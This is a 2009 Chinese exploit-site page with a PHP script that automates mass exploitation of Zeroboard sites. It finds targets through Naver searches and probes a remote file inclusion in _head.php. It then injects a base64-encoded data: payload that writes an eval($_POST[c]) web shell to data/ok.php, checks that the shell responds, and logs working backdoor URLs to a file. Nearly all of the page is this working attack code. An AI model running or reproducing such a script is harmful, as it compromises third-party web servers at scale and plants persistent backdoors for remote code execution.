首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zeroboard 0day&Exp
来源:http://www.t00ls.net 作者:t00ls 发布时间:2009-09-22  

<?php
for ($ii=0;$ii<=300;$ii++)
{
$c=(int)$ii*10+1;
print $c."          \r\n";
echo"   +----------------------------------------------------------------+\r\n";
echo"                  http://www.t00ls.net     \r\n";
echo"   +----------------------------------------------------------------+\r\n";
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=<STRONG><FONT color=#ff0000>zboard</FONT></STRONG>.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);
}
function get($host,$file)
{
          
            $fp = fsockopen($host, 80, $errno, $errstr, 10);
            if (!$fp) {
                echo "SocketError: $errstr ($errno)\n";
                return false;
            }
            $get = "GET $file HTTP/1.1\r\n";
            $get .= "Host: $host\r\n";
            $get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
            $get .= "Referer: http://$host\r\n";
            $get .= "Connection: Close\r\n";
                        $get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
            fwrite($fp, $get);
            $response=stream_get_contents($fp);
            preg_match_all("(<a href=\"http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?<STRONG><FONT color=#ff0000>zboard</FONT></STRONG>\.php)",$response,$put);
            for ($i=0;$i<count($put[0]);$i++)
                        {
                                $a=preg_replace('(<a href=\")','',$put[0][$i]);
                               
                               
                                fuck($a);
                       
                        }
                       
           
                    //$sh=fopen('data.txt',"a+");
                        //fwrite($sh,$okk);
                        //fclose($sh);
            fclose($fp);
                                               
}
function fuck($ok)
{
$a=preg_replace('(<STRONG><FONT color=#ff0000>zboard</FONT></STRONG>.php)','',$ok);
$file=$a."_head.php?_zb_path=/tmp%002345";
$xxx=$a."_head.php?_zb_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx)) 
{
print $sitepath."     Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath."    %00 ok"."\r\n";
}
if (eregi("(fuckyou)",$oksehll))
{
print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('<STRONG><FONT color=#ff0000>zboard</FONT></STRONG>.txt',"a+");
fwrite($sh,$axx);
fclose($sh);
}
 
}
else
{
print $sitepath."     Vulnerability no"."\r\n";
}
}

?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Gnuboard 0day&Exp
·PHPCMS 2008 (job.php \$genre)
·Mozilla Firefox versions 3.0.1
·BigAnt Server <= 2.50 SP6 Loca
·Joomla com_mytube (user_id) Bl
·cP Creator 2.7.1 (Cookie ticke
·Winplot (.wp2 File) Local Buff
·Microsoft IIS 5.0 FTP Server R
·Sun Solaris 10 RPC dmispd Remo
·html2ps versions 1.0 beta5 and
·PJBlog version 3.0.6.170 suffe
·CuteFTP version 8.3.3 Home/Pro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved